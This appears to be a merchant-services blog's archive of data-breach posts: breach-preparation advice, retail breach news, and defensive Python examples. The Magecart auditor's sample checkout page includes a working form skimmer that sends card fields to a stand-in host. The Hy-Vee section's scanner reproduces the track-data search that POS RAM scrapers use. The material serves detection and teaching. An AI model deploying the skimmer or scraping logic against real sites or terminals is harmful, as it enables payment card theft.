Tag Archives: data breach


How Businesses Should Prepare For a Data Breach [2023 Update]

You might not want to think about it, but there is always a chance your business will be hit by a data breach. The information you keep on your customers, your finances, and other sensitive matters could be exposed or lost. You can prepare for a breach by looking at how your business handles data today and by deciding, in advance, what will happen when something goes wrong.

Establish a Relationship With Your IT Department 


The first way to prepare for a data breach is to look at how your IT department operates. Many businesses assume IT is only about keeping the website online. But IT is also responsible for reviewing how data moves across your systems and for keeping hostile parties out of them.

Build a working relationship with your IT department so that you have more control over possible threats. There are several things you can ask of IT to keep everyone's data safe:

  • Agree on the security controls you will use in the workplace, including hardware and software firewalls, endpoint protection and antivirus, and decide who is responsible for keeping each of them configured and current.
  • Tell your IT department how you handle customers' data, including how your business complies with the California Consumer Privacy Act (CCPA) and any other privacy rules that apply to you.
  • Have a fractional (part-time) privacy officer review your IT and data-handling practices. A privacy officer can identify flaws in your security and IT functions and advise you on how to fix the problems you find.
  • Produce a data map showing what data you collect, where it is stored, how it travels between systems, and who can access it at each stage. The map should be complete enough that, when something goes wrong, you can tell immediately which data and which systems are involved.

Every system in your workplace needs proper controls if your data is to stay secure. Make sure you have a plan for how you manage your data and that you know where all of it lives.

Data Breach – Plan a Response Team

A data breach response team reviews the threats that come with a breach and works out how to resolve the issue as quickly as possible. A response team has several roles:

  • Every response team needs a leader who runs the response effort and makes the final calls.
  • A customer care or communications representative contacts the public and affected customers with accurate information about the breach. That person's job is to keep customers informed, not to reassure them with claims the investigation has not yet confirmed.
  • A few members of the IT team review the compromised systems and data, identify how the attackers got in, and confirm that they no longer have access.
  • The C-suite plans the business response, including how data moves during the incident and how it will be preserved for the investigation. Backups of the affected systems are essential both for recovery and as evidence.

All members of your response team should be easy to reach when a breach occurs, and each should know in advance which data they are responsible for and how they will keep it under control.


Plan a Least Privilege Model

A least privilege model gives each employee access only to the smallest amount of data and the fewest systems needed to do their job. Building this into your data protection plan limits how much data a single careless or compromised account can expose.

You can also use tokenization, which replaces identifiable data such as card numbers with random tokens that have no meaning outside a tightly controlled token vault. A token cannot be reversed without access to that vault, so systems and employees that only need the token never see the real data. This works alongside a least privilege model to reduce the amount of identifiable data that appears when handling a transaction.

RBAC Also Helps

Another point to plan is the roles people have when accessing data. A role-based access control (RBAC) system assigns permissions to roles, such as cashier, support agent or accountant, and then assigns each employee to one or more roles. Employees still see only the data their work requires, but you can now say precisely which roles may review which data, and an employee's access changes automatically when their role changes. Roles should follow job function, not seniority or experience: a long-serving employee whose job does not involve card data should not have access to it.
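The following is an added example, written for this article rather than taken from it, showing how the least privilege model, tokenization and RBAC described above fit together in code. The role names, permissions and the customer record are assumptions made for illustration; the card number is the well-known 4111 1111 1111 1111 test number.

```python
import secrets

# Assumed role definitions: each role gets only the (resource, action) pairs its
# job requires (least privilege).  Only "finance" can ever recover a full card number.
ROLE_PERMISSIONS = {
    "support":   {("customer", "read"), ("card", "read_masked")},
    "finance":   {("customer", "read"), ("card", "read_masked"), ("card", "read_full")},
    "marketing": {("customer", "read")},
}


def is_allowed(role: str, resource: str, action: str) -> bool:
    """RBAC check: permissions are attached to the role, never to the person."""
    return (resource, action) in ROLE_PERMISSIONS.get(role, set())


class TokenVault:
    """Holds the only copy of each card number (PAN) and hands out opaque tokens.

    The token is random, so it cannot be "decoded" back to the PAN; the mapping
    lives solely in this vault, which is the one component that needs the
    strongest controls.  An in-memory dict stands in for what would be a separate,
    encrypted, access-logged store (assumption for this example).
    """

    def __init__(self) -> None:
        self._pan_by_token: dict[str, str] = {}
        self._token_by_pan: dict[str, str] = {}

    def tokenize(self, pan: str) -> str:
        if pan not in self._token_by_pan:
            token = "tok_" + secrets.token_hex(12)
            self._token_by_pan[pan] = token
            self._pan_by_token[token] = pan
        return self._token_by_pan[pan]

    def detokenize(self, token: str, role: str) -> str:
        # Detokenization is itself a privileged action and is checked here,
        # inside the vault, rather than trusted to the caller.
        if not is_allowed(role, "card", "read_full"):
            raise PermissionError(f"role {role!r} may not read full card numbers")
        return self._pan_by_token[token]


def store_card(vault: TokenVault, customer: dict, pan: str) -> None:
    """What the application database keeps: a token and the last four digits.
    The PAN itself never lands in the customer record."""
    customer["card_token"] = vault.tokenize(pan)
    customer["card_last4"] = pan[-4:]


def view_card(vault: TokenVault, role: str, customer: dict) -> str:
    """Return the most that this role is entitled to see of the card."""
    if is_allowed(role, "card", "read_full"):
        return vault.detokenize(customer["card_token"], role)
    if is_allowed(role, "card", "read_masked"):
        return "*" * 12 + customer["card_last4"]
    raise PermissionError(f"role {role!r} may not view card data")


if __name__ == "__main__":
    vault = TokenVault()
    cust = {"id": 42, "name": "A. Customer"}      # constructed sample record
    store_card(vault, cust, "4111111111111111")  # well-known test card number
    print(cust)                                  # token and last four digits, no PAN
    print(view_card(vault, "support", cust))     # ************1111
    print(view_card(vault, "finance", cust))     # 4111111111111111
    try:
        view_card(vault, "marketing", cust)
    except PermissionError as err:
        print("denied:", err)
```

The point of keeping the token and the last four digits in the customer record is that a breach of the application database, or a marketing or support account, yields nothing a fraudster can charge; the PAN can only be recovered through the vault, and the vault enforces the role check itself.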


Review Your Current System

Check your current data storage systems to reduce the damage a breach can do if your data is ever lost or exposed. The review should cover at least these points:

  • Look at your current encryption. Cardholder data and customers' personally identifiable information should be encrypted both in transit and at rest, using current, well-reviewed algorithms, and the keys should be stored and managed separately from the data they protect.
  • Keep all software current with vendor patches and updates. Timely patching closes known security holes, reducing the likelihood and severity of an intrusion.
  • Monitor the software and other solutions you use to control data. Security tools that you cannot configure, or whose output nobody reads, provide little protection.
  • Review the passwords people use when handling data. Passwords should be private, unique to each system, and long enough to be hard to guess; a minimum length is more effective than complicated character rules, and passwords that appear in known breach lists should be rejected. Wherever possible, add multi-factor authentication on top.

Be Prepared For Possible Failures

While you should plan to succeed in everything you do, never assume you will succeed every time you manage your business's data. A response plan makes a difference, because it helps you contain the damage and keeps the harm from growing worse than it needs to be.

A data breach is a frightening prospect for any business owner. But it does not have to be a catastrophe if you prepare for it. Look at how you manage your data, have a plan for what to do if a breach occurs, and make sure everyone knows their part in it.

More Than a Million T-Mobile Prepaid Customers Impacted by Data Breach

In the United States, prepaid wireless services took a while to catch on; while customer demand was there from the beginning, telecoms were apprehensive about deviating from the tried-and-true service contract and monthly billing arrangements. Eventually, American wireless providers gave in to demand, and they marketed this option as more convenient, more flexible, and just as secure as cell phone service contracts.

Although the U.S. does not mandate prepaid SIM registration the way many other countries do, a prepaid customer who sets up an online account still becomes an account record containing personally identifiable information, and one that is often tied to payment details to make it easier to add credit, airtime, and services. With regard to data security, there is no difference between wireless contracts and prepaid arrangements, and this is something that T-Mobile recently had to contend with.

According to an official notice issued by T-Mobile on November 22, a data breach affected about 1.12 million prepaid customers, which T-Mobile described as less than 1.5% of its total user base. The incident occurred in early November, and it looks like a standard cybercrime situation rather than an insider attack. Affected customers received SMS notifications about the incident and were urged to change their passwords and the PINs they use for account access.

Fortunately, the attackers were not able to reach the financial records associated with the accounts, so credit card numbers and Social Security numbers were not compromised; nonetheless, the stolen records include names, phone numbers, account numbers, and billing addresses. In the hands of groups dedicated to identity theft and account takeover, this type of information can be very dangerous.

Earlier this year, attackers gained access to records of Sprint wireless subscribers by exploiting a vulnerability on a Samsung website that caters to owners of Samsung smartphones. As in the T-Mobile incident, payment card data was not accessed; that is probably because the Payment Card Industry Data Security Standard (PCI DSS) requires card data to be stored separately from, and protected more strictly than, ordinary account records.

For the payment processing industry, prepaid wireless services have become a substantial segment of their business. Unlike wireless contracts, which are mostly settled once per month and sometimes just once per year for customers seeking deep discounts, topping up prepaid smartphones with voice minutes or blocks of data is something that they may do a couple of times each week, and even more often when carriers send out notifications with coupons and special deals. The most privacy-conscious will only “top up” their cell phones with cash; however, quite a few end up linking credit and debit cards for convenience.

Macy’s Website Hacked

This week, major U.S. department store chain Macy's revealed that it was the target of a cyber attack that attempted to steal its customers' payment information.

According to Macy's, the macys.com website was infected on October 7 with what the company describes only as "unauthorized code" on its "My Wallet" and "Checkout" pages. The code captured payment card data from customers who entered it on either of those two pages. Macy's says it did not detect the compromise until October 15, more than a week after it occurred.

The information the attackers were able to capture included customers' full names and addresses, email addresses, phone numbers, and payment card details, including card numbers, security codes, and expiration dates, for anyone who typed that information into one of the compromised pages.

In its statement, Macy's confirmed that it is investigating the incident and has taken preventive steps intended to stop this sort of compromise from recurring. Macy's also said that only a small number of macys.com customers were affected, and it is offering those customers one year of free credit monitoring.

In a separate statement, a Macy's spokesperson said the following: "We are aware of a data security incident involving a small number of our customers on Macys.com. We have investigated the matter thoroughly, addressed the cause and have implemented additional security measures as a precaution. All impacted customers have been notified, and we are offering consumer protections to these customers at no cost."

First spotted around 2010, intrusions such as this one are known as Magecart attacks, after the attackers' early preference for the Magento e-commerce platform, and they have surged over the past two years. In a Magecart attack, the criminals compromise a company's legitimate online store and place a malicious JavaScript skimmer on the payment form, so that customers' account details and card numbers are copied to the attackers as they are typed during a purchase.
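A merchant cannot rely on the skimmer announcing itself, so the practical check is to inventory every script that loads on the checkout page and flag anything unexpected. The following is an added example, not code from the article or from Macy's, of that audit: it parses a page's HTML, reports external scripts whose host is not on an allowlist or that lack a Subresource Integrity attribute, and flags inline scripts that both read form fields and send data off the page. The host names, the allowlist and the sample checkout page (including the injected skimmer) are all constructed for the example, and the inline-script test is a simple heuristic rather than a complete detector.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed: the merchant's own host and the one third-party host that may serve
# scripts on the checkout page (the payment provider).
FIRST_PARTY_HOST = "shop.example"
ALLOWED_THIRD_PARTY_HOSTS = {"js.payments.example"}

# Heuristic markers (assumption): an inline script that reads input values AND
# uses one of these mechanisms to send data is treated as a skimmer candidate.
FIELD_READ_HINTS = ("input", ".value")
EXFIL_HINTS = ("fetch(", "XMLHttpRequest", "sendBeacon", "new Image", "WebSocket")


class ScriptCollector(HTMLParser):
    """Records every <script> on a page: external ones as (src, has_integrity),
    inline ones as their body text."""

    def __init__(self) -> None:
        super().__init__()
        self.external = []
        self.inline = []
        self._in_inline = False
        self._chunks = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        attrs = dict(attrs)
        if attrs.get("src"):
            self.external.append((attrs["src"], "integrity" in attrs))
        else:
            self._in_inline = True
            self._chunks = []

    def handle_data(self, data):
        if self._in_inline:
            self._chunks.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._chunks))
            self._in_inline = False


def audit_checkout_page(html: str) -> list:
    """Return human-readable findings for one page of checkout HTML."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src, has_integrity in collector.external:
        host = urlsplit(src).hostname
        if host is None or host == FIRST_PARTY_HOST:
            continue  # served by the shop itself
        if host not in ALLOWED_THIRD_PARTY_HOSTS:
            findings.append("unexpected third-party script: " + src)
        elif not has_integrity:
            findings.append("allowed third-party script without integrity attribute: " + src)
    for body in collector.inline:
        reads_fields = all(hint in body for hint in FIELD_READ_HINTS)
        exfiltrates = any(hint in body for hint in EXFIL_HINTS)
        if reads_fields and exfiltrates:
            findings.append("inline script reads form fields and sends data off-page")
    return findings


# Constructed sample checkout page: one legitimate payment script with SRI, one
# injected third-party script, and an inline skimmer that posts field values.
SAMPLE_CHECKOUT_HTML = """
<html><body>
<form id="checkout">
  <input name="cc_number"><input name="cvv"><button>Pay</button>
</form>
<script src="/static/checkout.js"></script>
<script src="https://js.payments.example/v1/pay.js" integrity="sha384-AAAA"></script>
<script src="https://cdn-jquery-static.example/jquery.min.js"></script>
<script>
document.getElementById("checkout").addEventListener("submit", function () {
  var d = {};
  document.querySelectorAll("input").forEach(function (i) { d[i.name] = i.value; });
  new Image().src = "https://stats-collector.example/p.gif?q=" + btoa(JSON.stringify(d));
});
</script>
</body></html>
"""

if __name__ == "__main__":
    for finding in audit_checkout_page(SAMPLE_CHECKOUT_HTML):
        print("FINDING:", finding)
```

Run this against a fresh fetch of the checkout page on a schedule and alert on any change in the findings; the complementary preventive control is a Content-Security-Policy header whose script-src lists only the same allowed hosts, so the browser refuses the injected script even if the page is modified.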

Cybersecurity firm RiskIQ recently published a report on the Magecart cyber thieves in which they stated the following: “Magecart is a rapidly growing cybercrime syndicate comprised of dozens of subgroups that specialize in cyber attacks involving digital credit card theft.”

E-skimming attacks have become so widespread that more than 18,000 domains have been affected, and the FBI has issued a warning urging businesses to put sufficient defenses in place. The methods the FBI recommends include keeping software up to date, segregating critical network infrastructure, enabling multi-factor authentication, and watching for phishing attacks, which are a common way for attackers to obtain the credentials they need to plant a skimmer.

And one last thing to consider if you are a merchant and you are worried about data breaches affecting your bottom line: Host Merchant Services Data Breach Security Program. Click that link to download a PDF explaining the value-added service HMS provides its merchants that goes above and beyond just simple PCI Compliance and helps ensure a merchant’s peace of mind.

Online Retail Fraud on the Rise

According to the 2019 Fraud Attack Index from e-commerce fraud prevention company Forter, attempts to defraud online retailers have increased for the second consecutive year, with online electronics and food and beverage retailers seeing the biggest increases.

After analyzing merchant and transaction data, Forter determined that the rate of e-commerce fraud attacks increased between 2017 and 2018 across several verticals.

Electronics

Fraud targeting electronics retailers rose 73% in 2018 compared with the year before. Electronic devices carry hefty price tags and are easily resold, which makes them appealing to fraudsters. Forter's analysis shows that shoppers are happy to buy electronics from third-party marketplaces to get a better deal, and many fraudsters list their stolen goods there as "refurbished" items.

Food and Beverage

Fraud attacks against food and beverage companies rose even more, by 79% between 2017 and 2018, following a 60% increase between 2016 and 2017. Forter's analysis suggests that fraudsters use low-priced food and beverage orders to test whether a stolen card or e-wallet still works before moving on to more expensive items.

Clothing

Fraud attempts against online clothing retailers rose 47% between 2017 and 2018. Clothing has always been attractive to criminals because bulk orders can be resold with relative ease, and, as with electronics, many legitimate buyers are eager to purchase clothing from third-party resale sites.

Fraudsters also use bots to buy up limited-edition clothing runs, which they then resell at substantial mark-ups.

Jewelry and Luxury Items

It goes without saying that criminals are attracted to the high value of jewelry. 2018 saw a 19% year-on-year increase in attacks on online sellers of jewelry and other luxury items.

Forter's study also looked at the methods most often used to attack online retailers. Account takeovers, in which criminals gain access to an unsuspecting customer's account to make purchases or redeem loyalty points, grew 45% in 2018 compared with 2017. Attacks by fraud rings, groups of criminals working together, grew 26% year-on-year.

The sharpest increase was in policy abuse, which means cheating retailers through discount codes and coupons, creating multiple accounts, or overusing referral reward programs. This grew by 170%, while stricter e-commerce returns policies cut the more traditional returns abuse by 90%.

As of 2019, these are the 10 U.S. states (counting the District of Columbia) with the highest rates of identity theft and fraud:

  • 1. District of Columbia
  • 2. California
  • 3. Nevada
  • 4. New Hampshire
  • 5. South Carolina
  • 6. Delaware
  • 7. Louisiana
  • 8. Texas
  • 9. New York
  • 10. Florida

And one last thing to consider if you are a merchant and you are worried about data breaches or fraud affecting your bottom line: Host Merchant Services Data Breach Security Program. Click that link to download a PDF explaining the value-added service HMS provides its merchants that goes above and beyond just simple PCI Compliance and helps ensure a merchant’s peace of mind.

UniCredit Unveils Data Breach That Involves 3 Million Users

On Monday, UniCredit revealed that a file from 2015 containing the names, addresses, phone numbers, and email addresses of more than 3 million of its customers had been compromised and leaked.

This occurred despite UniCredit's spending an additional €2.4 billion over the past three years on IT upgrades, including cyber security. Although UniCredit serves customers worldwide, the leaked records relate only to its Italian client base.

The breach was reported to the authorities last Thursday, October 24, a company representative told Reuters. No details were given about how the breach happened, but the spokesman confirmed that an internal investigation is under way. Italian police are also examining whether other crimes were committed in conjunction with the breach.

This is the third such incident to affect UniCredit, after two previous breaches, between September and October 2016 and between June and July 2017, in which the private information of over 400,000 Italian customers was compromised. This latest incident is not thought to be linked to those two, which resulted from a third party accessing customer data without authorization.

In its statement on Monday, the bank was quick to assure customers that no sensitive financial information was leaked, and that nothing in the data could be used to gain unauthorized access to customer accounts. What was lost is personally identifiable information (PII), which on its own cannot be used to make unauthorized transactions. It is, however, exactly the material used in social engineering and phishing campaigns, and it can aid anyone attempting identity theft.

UniCredit customers affected by the breach will have been contacted either through online banking notifications or by post. The bank is expected to present a new business plan in early December.


Companies Ask Congress For Data Protection Law

Dozens of CEOs from companies such as IBM and Amazon have sent an open letter to Senate and House leaders asking for a comprehensive federal data protection law. The letter argues that state consumer privacy laws are not enough because they vary widely, cause confusion, and threaten the competitiveness of the United States. The companies claim a federal law would create a more stable policy environment that lets them build products within clear and predictable boundaries.

The letter was sent on behalf of Business Roundtable, an association of CEOs of some of the largest companies in the United States. The CEOs of Walmart, State Farm, Salesforce, Qualcomm, IBM, AT&T, Visa, Mastercard, JP Morgan Chase, and Amazon are among those who have signed the letter.

The group blames the growing number of differing state privacy regulations for complicating consumer privacy in the country. This patchwork also makes compliance harder for companies that must satisfy laws across multiple jurisdictions.

One of the most comprehensive privacy protections passed at the state level is the California Consumer Privacy Act (CCPA), a landmark law that takes effect on January 1, 2020. From then on, California residents have the right to learn what personal data a company has collected about them and to ask the company to delete it or not sell it to third parties. Companies will also have to be more upfront about what data they collect.

Although CCPA is a state law, it applies to any business, in or out of state, that does business with California residents and meets its size or data-volume thresholds, which includes many online merchants that sell into California. Any such merchant has a strong interest in complying with CCPA rather than walking away from the fifth largest economy in the world.

With a single federal law for privacy and data protection that would supersede state laws, product design, data management, and compliance would be simplified.

However, some privacy advocates argue the tech companies are more interested in protecting their own interests: consolidating privacy regulation under a federal umbrella would give lobby groups a single target and an opportunity to water down meaningful protections. Strong protections could make it harder for companies to sell certain types of consumer data to online advertisers, a large and growing line of business.

The Business Roundtable released its own consumer privacy framework that it wants Congress to use as the basis for a future privacy law. The proposal includes, in broader terms, many provisions of the European Union's General Data Protection Regulation (GDPR).

In February, the U.S. Government Accountability Office (GAO), the government's auditing agency, recommended that Congress consider passing a national data privacy law, along the lines of the GDPR, to improve consumer protections. GAO also recommended putting the FTC in charge of enforcing any future U.S. privacy law.

By June, reports surfaced that lawmakers had hit a roadblock in creating a national privacy law: senators could not agree on how strict the rules should be or on the bill's key provisions.


FAQ: Companies Ask Congress For Data Protection Law

Why are companies asking Congress for a data protection law?

Companies are asking Congress for a data protection law to establish a single framework for handling personal data in the United States. The absence of a comprehensive federal law has led to a patchwork of state-level regulations, creating compliance complexities for businesses operating across multiple jurisdictions.

Companies say they need clear guidelines and standardized practices to protect consumer data, improve cybersecurity, and build trust with their customers. A federal data protection law would provide one consistent set of rules and requirements, so companies could navigate the regulatory landscape more easily while safeguarding individuals' privacy rights.

What are the benefits of a federal data protection law?

A federal data protection law offers several advantages. It provides a clear and consistent regulatory framework for businesses to follow, reducing ambiguity and compliance burdens, and it establishes baseline standards for data privacy, security, and breach notification, which enhances consumer protection.

A unified law simplifies compliance for companies operating nationally, minimizing the cost of meeting varying state-level requirements. It also fosters trust between businesses and consumers, as individuals can have greater confidence that their personal information is being handled responsibly. Finally, a federal law can make cross-border data transfers easier, facilitating international business operations.

What are the challenges to passing a federal data protection law?

Several challenges hinder the passage of a federal data protection law. First is the difficulty of crafting legislation that balances the interests of businesses, consumers, and government agencies. Finding consensus on issues such as defining personal data, determining appropriate consent mechanisms, and setting penalties for non-compliance is hard.

Political divisions and differing priorities among lawmakers also cause delays. Lobbying by various industries may shape the content and scope of the law, potentially diluting its effectiveness. Striking a balance between protecting privacy rights and enabling innovation is a delicate task that requires careful negotiation and compromise among stakeholders.

Hy-Vee Data Breach

In mid-August 2019, convenience store and supermarket chain Hy-Vee reported a data breach involving its point-of-sale systems. Few details were given initially; it took about a week for security researchers to take a closer look and provide more information. Before discussing the known details, note that the breach does not involve the clearing of card payments; it is isolated to point-of-sale equipment and its supporting data network.

Hy-Vee is a major brand in the American Midwest; the company operates convenience stores, supermarkets, snack bars, and gas stations in South Dakota, Missouri and six other states. As you would expect from a merchant of this size, many locations handle payments through a shared point-of-sale (POS) network. What is known so far is that the attackers targeted the POS and card reader terminals at the company's gas stations, cafes, Market Grille restaurants and Wahlburgers fast-food eateries. The POS and card processing systems at Hy-Vee supermarkets and convenience stores were not affected because they run on a separate network.


According to an investigation by Brian Krebs, a respected information security journalist, the Hy-Vee breach resulted in the theft of about five million credit and debit card numbers from customers in 35 states, as well as from a few countries in Europe and the Middle East. Those records have found their way to underground markets, where they are being sold for fraud. The specific market Krebs mentions is Joker's Stash; the data dump is titled "Solar Energy," and the sellers are asking between $17 and $35 per card.

Since Hy-Vee is still investigating, individual cardholders who may have been affected have not yet been notified, and the locations and times of the compromised transactions have not been revealed. Nothing has been said officially about the breach mechanism either, but the Krebs report indicates that the POS network was likely infected with malware that scrapes card data from the magnetic stripe as it passes through the terminal's memory. The POS equipment at Hy-Vee supermarkets, convenience stores, and drugstores uses point-to-point encryption (P2PE), which encrypts card data inside the reader so that the terminal and the rest of the POS network never see it in clear text; that does not appear to be the case for the equipment at the affected gas stations, cafes and restaurants.
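POS memory-scraping malware works by searching process memory for the fixed layout of magnetic-stripe track data, and the same search is what an incident responder runs over a memory dump to confirm whether clear-text card data was ever present. The following is an added example, written for this article and not taken from Hy-Vee, Krebs or any malware sample: it scans a buffer for Track 1 and Track 2 patterns and keeps only hits whose card number passes the Luhn check. The buffer is a constructed stand-in for a memory dump, the card numbers are the standard 4111... and 5555... test numbers, and the trailing bytes labelled "p2pe" stand in for encrypted reader output, which the scan does not match.

```python
import re

# Magnetic-stripe layouts as written by the card issuer:
#   Track 1: %B<PAN>^<NAME>^<YYMM><service code><discretionary data>?
#   Track 2: ;<PAN>=<YYMM><service code><discretionary data>?
TRACK1_RE = re.compile(rb"%B(\d{13,19})\^([^\^]{2,26})\^(\d{4})(\d{3})")
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{4})(\d{3})")


def luhn_ok(pan: str) -> bool:
    """Luhn check digit test: real card numbers pass, most random digit runs fail."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:                     # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def scan_for_track_data(buf: bytes) -> list:
    """Return one record per clear-text track found in buf whose PAN passes Luhn,
    ordered by offset."""
    found = []
    for m in TRACK1_RE.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            found.append({"track": 1, "offset": m.start(), "pan": pan,
                          "name": m.group(2).decode(), "expiry": m.group(3).decode(),
                          "service_code": m.group(4).decode()})
    for m in TRACK2_RE.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            found.append({"track": 2, "offset": m.start(), "pan": pan,
                          "expiry": m.group(2).decode(),
                          "service_code": m.group(3).decode()})
    return sorted(found, key=lambda r: r["offset"])


# Constructed stand-in for a POS process memory dump.
SAMPLE_DUMP = (
    b"\x00\x00POS-APP v3.1\x00\x00"
    + b"%B4111111111111111^DOE/JOHN^25121011234567890?"   # clear-text Track 1, test PAN
    + b"\x00" * 16
    + b";5555555555554444=25121011234567890?"             # clear-text Track 2, test PAN
    + b"\x00" * 8
    + b";1234567890123456=26011011234?"                   # Track 2 shape, fails Luhn
    + b"\x00" * 8
    + b"p2pe:" + bytes([0x8F, 0x11, 0xA3, 0x90, 0x02, 0x7B, 0xE4, 0x4C, 0x19, 0x60])  # encrypted reader output
)

if __name__ == "__main__":
    for rec in scan_for_track_data(SAMPLE_DUMP):
        # Print masked: the scan output is itself cardholder data.
        print(f"track {rec['track']} at offset {rec['offset']}: PAN ****{rec['pan'][-4:]} "
              f"expiry {rec['expiry']} service code {rec['service_code']}")
```

The two legitimate tracks are found and the Luhn-failing decoy is dropped; the bytes after "p2pe:" match nothing, which is the whole argument for point-to-point encryption: when the reader encrypts before the data reaches the terminal, a scraper running on that terminal has nothing to scrape.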

While the Hy-Vee breach can lead to card cloning, the company does not believe shoppers need to worry about identity theft, given the type of information stolen. Still, merchants can take two lessons from this case: point-to-point encryption is always preferred for POS equipment, and cyber insurance is more important than ever. It is too early to say whether liability will fall on Hy-Vee or on the vendor managing the POS network, but that is something merchants should think about. When card data is encrypted at the reader and not decrypted until it reaches the payment processor, malware on the POS system has nothing useful to steal, and the impact of a breach is greatly reduced. Should a POS provider or payment processor fail to protect transactions properly, a good insurance policy can shield merchants from the legal claims that follow a breach.

Oracle MICROS Hackers

Oracle MICROS Hackers Also Hacked 5 Other Companies

American companies that rely on credit card processing and merchant services are on high alert after a Russian cybercrime group breached the servers of several point-of-sale (POS) system providers.

The first reported victim was tech giant Oracle, which acquired MICROS Systems, a major provider of POS solutions for the retail and hospitality industries, in 2014.

Cyber-Attack on Oracle MICROS

Following the attack on Oracle MICROS, five more providers of point-of-sale systems reported being hacked by the same crew.

The targeted companies have one thing in common: they all offer cloud-based cash registers, advanced POS systems integrated with functions such as employee scheduling, customer relationship management (CRM), credit card processing, marketing intelligence, and other merchant services.

Security analysts who covered these incidents explained that the attackers were looking specifically for customer account records, which suggests they were after credit card data. A likely suspect has already been named: the Carbanak Gang.

An initial investigation indicates that Oracle became aware of the breach when it detected malicious code on servers used by nearly 700 customers. The attack also reached a help desk system Oracle uses to provide technical support to clients. That is especially concerning, because access to the support system could let the attackers read service tickets and impersonate support agents to customers.

It is not unusual for crews such as the Carbanak Gang to be suspected of major cyber heists. Security researchers have followed this group for some time and believe it may be associated with the Bratva, the name insiders use for the Russian mafia.

It is often noted that one reason so many major cyber attacks originate in Russia is that computer education has strong support in public schools and state-funded universities. The Russian government is also believed to recruit skilled criminal hackers as cyber warfare operatives.

How MICROS Point of Sale Systems Got Hacked

Software giant Oracle Corporation became the victim of a data breach last week when a Russian organized cybercrime group gained access to hundreds of its systems. According to security experts, the group got in through a customer support portal for companies that use Oracle's MICROS point-of-sale software. MICROS is one of the most widely used POS systems in the world, deployed on more than 330,000 cash registers, so its compromise is a cause of great concern to consumers and businesses alike.

The extent of the breach is not yet known, as Oracle has been slow to comment, so far revealing only that malware was found on some systems run by MICROS and that unauthorized network connections and malicious processes had to be blocked. Oracle has also told customers that payment card data is encrypted throughout MICROS systems, which makes it less likely to be at risk. It is unclear whether customer data was taken at all, but MICROS is encouraging all of its customers to err on the side of caution, reset their passwords, and check their card statements.

A source with ties to the Russian criminal underground has claimed that this same group is tied to or responsible for stealing over $1 billion from banks worldwide last year through a series of malicious data breaches and hacking of merchant services worldwide. If this claim is true, this gang certainly knows what they are doing, and as a result the breach could potentially be much larger than anticipated. Oracle itself says that initially it expected the data breach to be localized to just a handful of systems but soon realized that it had reached in excess of 700 systems for merchant services.

MICROS is a massive service across industries ranging from hospitality to standard retail cash registers, and its wide span of use should be cause for concern for a great many businesses. While it is unlikely that this data breach was an attempt to steal personal info from consumers, given the gang’s past, it cannot be completely ruled out as a possibility. However, it is far more likely that this was a robbery, perhaps of funds or, at worst, of credit card processing information accessed through MICROS systems in order to steal from individuals.

Regardless of their intentions, the MICROS data breach is being touted as nothing less than a “very big deal.” It is potentially one of the largest data breaches in recent memory and one that certainly has the potential to be the most impactful to many consumers and businesses worldwide. It just goes to show that no company can be too secure when it comes to their merchant services and credit card processing systems.

Data Breach at Wendy’s Expands to Over 1000 Locations

Data security issues at Wendy’s have now been super-sized.

Following whispers of a data breach in January, Wendy’s finally confirmed payment security issues in May, when spokesmen admitted fewer than 300 stores had been affected by malware. Now, the company admits the real number of compromised restaurants is over 1,000.

Thieves installed malware on POS card terminals to capture card numbers, cardholder names, verification values, expiration dates, service codes and other critical data. Wendy’s stated that CVV codes were not at risk. The malware has been called “highly sophisticated in nature and extremely difficult to detect.”

The initial claim of fewer than 300 affected stores was cast into doubt by reports from card issuers that fraudulent charge volume indicated a far larger distribution throughout the chain’s 5,800 U.S. locations. Wendy’s states that the attack came in two separate waves, making it difficult to determine the total size of the data breach when it was first detected. Investigators first determined the scope as only 300 locations, only to be hit by a second, mutated strain of the malware soon thereafter.

The attack appears to have been the result of compromised security credentials used for remote access by third-party POS service companies. These companies are often hired by franchisees to manage POS systems in their restaurants, and most access them remotely. Of the 5,800 Wendy’s restaurants in the U.S., only about 630 are owned and operated by Wendy’s itself, with the remainder in the hands of local franchise owners. None of the company-owned stores have been implicated in the data breach.

In response to their discovery of the larger scale of the breach, Wendy’s has compiled a searchable database of affected locations. This database is accessible to customers on the company website.

The affected locations had not yet moved to the use of EMV chip cards. Gavin Waugh, vice president and treasurer at The Wendy’s Company, believes that the attack might not have been prevented by use of EMV. Wendy’s declined to provide a timetable for the completion of the rollout of EMV to their network of restaurants.

Gartner Group analyst Avivah Litan states that although many locations have received and installed EMV-capable terminals, not all have activated them. She acknowledged that there is a backlog of requests at the companies who certify EMV readiness for merchants ready to move to the new standard.